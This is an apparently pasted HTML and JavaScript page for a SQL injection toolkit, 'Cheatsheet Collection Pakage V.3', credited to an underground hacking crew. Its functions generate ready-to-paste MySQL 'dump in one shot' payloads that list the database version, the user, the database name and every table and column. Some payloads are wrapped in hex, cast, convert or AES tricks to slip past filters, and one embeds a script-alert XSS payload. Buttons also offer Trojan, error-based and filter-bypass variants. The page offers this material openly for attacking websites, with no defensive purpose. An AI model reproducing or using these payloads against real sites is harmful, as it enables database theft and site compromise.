  577. var mydios = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,0x496e6a6563746564204279205665727361696c6c65735c6e5c6e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d5c6e,0x55736572203e3e20,USER(),0x5c6e,0x44426e616d65203e3e20,DATABASE(),0x5c6e5c6e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d5c6e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d5c6e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d5c6e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)";
  578. document.getElementById('dios').value = mydios;
  579. }
  580.  
  581. function mydios2(){
  582. var mydios2 = "concat(0x496e6a6563746564204279205665727361696c6c65733c62723e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d3c62723e,0x55736572203e3e20,USER(),0x3c62723e,0x44426e616d65203e3e20,DATABASE(),0x3c62723e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d3c62723e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d3c62723e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d3c62723e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x))";
  583. document.getElementById('dios').value = mydios2;
  584. }
  585.  
  586. function hx(){
  587. var hx = prompt('Input Your Query','VERSION()');
  588. var hx = "hex(unhex("+hx+"))";
  589. document.getElementById('dios').value = hx;
  590. }
  591.  
  592. function cn(){
  593. var cn = prompt('Input Your Query','VERSION()');
  594. var cn = "convert("+cn+"+using+latin1)";
  595. document.getElementById('dios').value = cn;
  596. }
  597.  
  598. function cs(){
  599. var cs = prompt('Input Your Query','VERSION()');
  600. var cs = "cast("+cs+"+as+char)";
  601. document.getElementById('dios').value = cs;
  602. }
  603.  
  604. function cp(){
  605. var cp = prompt('Input Your Query','VERSION()');
  606. var cp = "uncompress(compress("+cp+")) ";
  607. document.getElementById('dios').value = cp;
  608. }
  609.  
  610. function aes(){
  611. var aes = prompt('Input Your Query','VERSION()');
  612. var aes = "aes_decrypt(aes_encrypt("+aes+",1),1)";
  613. document.getElementById('dios').value = aes;
  614. }
  615.  
  616. function tblc(){
  617. var tblc = alert("Count Total Tables with Table Name");
  618. var tblc = "concat(@c:=0x00,if((select+count(*)+from(information_schema.tables)where+table_schema=database()+and+@c:=concat(@c,0x3c6c693e,@tbl:=table_name,0x203a3a20,(select+count(*)from+information_schema.columns+where+table_Schema=database()+and+table_name=@tbl))),0x00,0x00),@c)";
  619. document.getElementById('dios').value = tblc;
  620. }
  621.  
  622. function dbc(){
  623. var dbc = alert("Count Total Databases");
  624. var dbc = "concat(0x546f74616c20446174616261736573203e3e20,(select+count(*)from+information_schema.schemata))";
  625. document.getElementById('dios').value = dbc;
  626. }
  627.  
  628. function tottbl(){
  629. var tottbl = alert("Count Total Tables");
  630. var tottbl = "concat(0x546f74616c205461626c6573203e3e20,(select+count(*)from+information_schema.tables+where+table_Schema=database()))";
  631. document.getElementById('dios').value = tottbl;
  632. }
  633.  
  634. function totcol(){
  635. var totcol = alert("Count Total Columns");
  636. var totcol = "concat(0x546f74616c20436f6c756d6e73203e3e20,(select+count(*)from+information_schema.columns+where+table_Schema=database()))";
  637. document.getElementById('dios').value = totcol;
  638. }
  639.  
  640. function countdb(){
  641. var countdb = alert("Count Total Databases with Database Name");
  642. var countdb = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)"; document.getElementById('dios').value = countdb;
  643. }
  644.  
  645.  
  646.  
  647. function about(){
  648. var about = alert("Cheatsheet Collection Pakage V.3\n\nBy : Versailles [ Sec7or Team ]\n\nThankz to All Author the queries\n\nI love Mayu Watanabe (Mayuyu AKB48)\n\nGreets :\nM@dbl00d - Minato - Sn00.py - 1DIOT - Sayap Hitam - Penyair - Sanusi - Sohai - i3r_Code - Ajkaro - Zen - Trjnx - Janus - Makman - Kashmiri Cheetah - CodeNinja - UniQue - Cracker Bikash - and All Injector >_<");
  649. }
  650.  
  651.  
  652.  
  653. </script>
  654. </head>
  655. <body>
  656. <center>
  657.  
  658. <div class="panel panel-default" style="width:900px;">
  659. <center><img src="https://1.bp.blogspot.com/-w4cFzpou82A/VxAidZYFo5I/AAAAAAAAAGg/fymQ5GOaxIgbacPj7VSxKRhEXuH75wl9gCLcB/s1600/ns2.png" height="125px" width="125px" />
  660. </center>
  661. <font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #F0FFFF;">
  662. <center><font color="#F0FFFF" size="4" face="Agency FB">N00bz Security Squad</font>
  663. <br>
  664.  
  665. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#mc"><i class="glyphicon glyphicon-plus"></i> STRINGS TOOLS </button>
  666.  
  667. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#q"><i class="glyphicon glyphicon-plus"></i> QUERY </button>
  668.  
  669.  
  670. <div id="mc" class="collapse">
  671.  
  672. <textarea id="str" rows="5" cols="70" placeholder="Strings"></textarea>
  673. <br>
  674. <button onclick="Str2Hex()"> Hex </button>
  675. <button onclick="Hex2Str()"> Unhex </button>
  676. |
  677. <input onclick="b64_enc();" type=button value="Base64Enc" name="encode">
  678. <input onclick="b64_dec();" type=button value="Base64Dec" name="decode">
  679. |
  680. <input onclick="esc();" type=button value="Escape" name="encode">
  681. <input onclick="unesc();" type=button value="Unescape" name="decode">
  682.  
  683. <br><br>
  684. <input type="text" size="25" id="wrd" placeholder="Words"> >>
  685. <input type="text" size="25" id="rep" placeholder="Replace">
  686. <input onclick="rplc();" type=button value="Replace All">
  687. <br><br>
  688.  
  689. <textarea id="hex" rows="5" cols="70" placeholder="Output">
  690. </textarea><br>
  691.  
  692. <br>
  693.  
  694. </div>
  695.  
  696. <div id="q" class="collapse">
  697. <br>
  698.  
  699. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#query"><i class="glyphicon glyphicon-plus"></i> DIOS QUERY </button>
  700.  
  701. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#sysvar"><i class="glyphicon glyphicon-plus"></i> SYSTEM VARIABLES </button>
  702.  
  703. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#otr"><i class="glyphicon glyphicon-plus"></i> OTHER </button>
  704.  
  705. <br>
  706. <div id="query" class="collapse">
  707.  
  708. <div class="dios">
  709. <table class="table table-striped table-bordered table-hover datatable">
  710. <tr>
  711. <td class="text-center">
  712. ======= :: DUMP IN ONE SHOOT :: =======</td>
  713. </tr>
  714.  
  715. <tr><td class="text-center">
  716. <button onclick="dios1()">Dios 1</button>
  717. <button onclick="dios2()">Dios 2</button>
  718. <button onclick="dios3()">Dios 3</button>
  719. <button onclick="dios4()">Dios 4</button>
  720. <button onclick="xssdios()">XssDios </button>
  721. <button onclick="trjn()"> Trojan 1 </button>
  722. <button onclick="trjnx()"> Trojan 2 </button>
  723. <button onclick="bypsfrm()"> Bypass From </button>
  724. </td></tr>
  725.  
  726. <tr><td class="text-center">
  727. <button onclick="postgre()"> Postgre </button>
  728. <button onclick="mssql()"> Mssql </button>
  729. <button onclick="bof()"> BOF </button>
  730. <button onclick="mydios2()"> Mydios 2 </button>
  731. <button onclick="makman()"> Makman </button>
  732. <button onclick="ebf()"> ErrBased </button>
  733. <button onclick="poligon()"> Poligon </button>
  734. <button onclick="multipoint()"> Multipoint </button>
  735. </td></tr>
  736. </table>
  737. </div>
  738. </div>
  739.  
  740. <br>
  741.  
  742. <div id="sysvar" class="collapse">
  743.  
  744. <div class="sv">
  745. <table class="table table-striped table-bordered table-hover datatable">
  746. <tr>
  747. <td class="text-center">
  748. ======= :: SYSTEM VARIABLES :: =======</td>
  749. </tr>
  750. </table>
  751. <table class="table table-striped table-bordered table-hover datatable">
  752. <tr><td>VERSION </td><td class="text-center"><button onclick="version1()">Version 1</button>
  753. <button onclick="version2()">Version 2</button>
  754. <button onclick="version3()">Version 3</button>
  755. <button onclick="version4()">Version 4</button>
  756. <button onclick="version5()">Version 5</button>
  757. </td></tr>
  758.  
  759. <tr><td>USER </td><td class="text-center"><button onclick="user1()">User 1</button>
  760. <button onclick="user2()">User 2</button>
  761. <button onclick="user3()">User 3</button>
  762. <button onclick="user4()">User 4</button>
  763. <button onclick="user5()">User 5</button>
  764. <button onclick="user6()">User 6</button></td></tr>
  765.  
  766. <tr><td>DATABASE </td><td class="text-center"> <button onclick="db1()">Database 1</button>
  767. <button onclick="db2()">Database 2</button>
  768. <button onclick="db3()">Database 3</button></td></tr>
  769. </table>
  770. </div>
  771.  
  772.  
  773. <table class="table table-striped table-bordered table-hover datatable">
  774. <tr><td class="text-center">
  775. <button onclick="o1()"> @@HOSTNAME </button>
  776. <button onclick="o2()"> @@VERSION_COMPILE_MACHINE </button>
  777. <button onclick="o3()"> @@VERSION_COMPILE_OS </button>
  778. </td></tr>
  779.  
  780. <tr><td class="text-center">
  781. <button onclick="o4()"> @@BASEDIR </button>
  782. <button onclick="o5()"> @@HV_OPENSSL </button>
  783. <button onclick="o6()"> @@HV_SYMLINK </button>
  784. <button onclick="o7()"> @@PORT </button>
  785. <button onclick="o8()"> @@SOCKET </button>
  786. </td></tr>
  787. </table>
  788.  
  789. </div>
  790.  
  791.  
  792.  
  793. <div id="otr" class="collapse">
  794.  
  795. <div class="othr">
  796. <table class="table table-striped table-bordered table-hover datatable">
  797. <tr>
  798. <td class="text-center">
  799. =======-::OTHERS::-=======</td>
  800. </tr>
  801. </table>
  802.  
  803. <table class="table table-striped table-bordered table-hover datatable">
  804. <tr><td class="text-center">
  805. <button onclick="xssqli()"> PopUP </button>
  806. <button onclick="kolom()"> Generate Column </button>
  807. <button onclick="mydios()"> MyDios </button>
  808. <button onclick="hx()"> Hex </button>
  809. <button onclick="cn()"> Convert </button>
  810. <button onclick="cs()"> Cast </button>
  811. <button onclick="cp()"> Compress </button>
  812. <button onclick="aes()"> Aes </button>
  813. </td></tr>
  814.  
  815. <tr><td class="text-center">
  816. <button onclick="dbc()"> Total Databases </button>
  817. <button onclick="tottbl()"> Total Tables </button>
  818. <button onclick="totcol()"> Total Columns </button>
  819. <button onclick="tblc()"> Total Col </button>
  820. <button onclick="countdb()"> Count DB </button>
  821. <button onclick="about()"> About </button>
  822. </td></tr>
  823. </table>
  824.  
  825. </div></div>
  826.  
  827. <br>
  828. <textarea id="dios" rows="5" cols="70" placeholder="Output">
  829. </textarea>
  830. <br>
  831.  
  832. </div>
  833. <br>
  834.  
  835. <hr>
  836. &copy; 2016 | Coded By Versailles</a><br>N00bz | Recode By ./R015<br>Gretzz::<marquee direction="right" scrollamount="5" scrolldelay="50" width="100%">- [!] JIHAD797 [!] - Devs - Krypton - MrXscr3t - JakRapp - MR.3RROR - Dawn_Angel - PW1337 - Mr.Vendetta_404</marquee>
  837.  
  838. <footer id="det" style="left:0px; right:0px; bottom:0px; background:transparent; text-align:center; border-top: 2px solid #4E4E4E; border-bottom: 0px solid Black; position:fixed"><font color="white" size="5" face="Passion One" style=""><font color="red" style="">.::OFFICIAL MEMBER ::.</font><marquee scrollamount="5" scrolldelay="50" width="100%"><font color="#FF0000" style="text-"> - Devs - ./R015 - ./GhostMan - ./F4R1Z - </marquee></font></footer>
  839.  
  840.  
  841. </div>
  842. </body>
  843. </html>
Add Comment
Please, Sign In to add comment